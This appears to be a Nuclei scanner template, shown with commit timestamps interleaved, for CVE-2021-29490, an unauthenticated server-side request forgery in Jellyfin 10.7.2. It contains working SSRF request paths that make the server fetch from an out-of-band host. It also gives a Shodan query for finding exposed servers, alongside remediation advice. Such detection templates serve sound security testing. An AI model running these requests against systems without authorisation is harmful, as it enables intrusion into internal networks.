2021-11-24 15:01:45 +00:00
id : CVE-2021-29490
info :
2023-03-09 14:48:32 +00:00
name : Jellyfin 10.7.2 - Server Side Request Forgery
2021-11-24 15:01:45 +00:00
author : alph4byt3
severity : medium
2022-10-19 10:54:26 +00:00
description : |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
2021-11-24 15:01:45 +00:00
reference :
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
2022-10-19 10:54:26 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
2023-04-12 10:55:48 +00:00
remediation : Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
2021-12-04 07:17:12 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.8
2021-12-04 07:17:12 +00:00
cve-id : CVE-2021-29490
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
epss-score : 0.00137
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
2022-10-19 10:54:26 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2022-10-19 10:54:26 +00:00
shodan-query : http.title:"Jellyfin"
2023-07-11 19:49:27 +00:00
vendor : jellyfin
product : jellyfin
2022-10-19 10:54:26 +00:00
tags : cve,cve2021,ssrf,jellyfin,oast
2021-11-24 15:01:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-24 15:01:45 +00:00
- method : GET
path :
2023-03-09 14:48:32 +00:00
- "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"
2021-11-24 15:01:45 +00:00
2022-10-19 10:54:26 +00:00
stop-at-first-match : true
2021-11-24 15:01:45 +00:00
matchers :
- type : word
2022-10-19 10:54:26 +00:00
part : body
2021-11-24 15:01:45 +00:00
words :
2022-10-19 10:54:26 +00:00
- "<h1> Interactsh Server </h1>"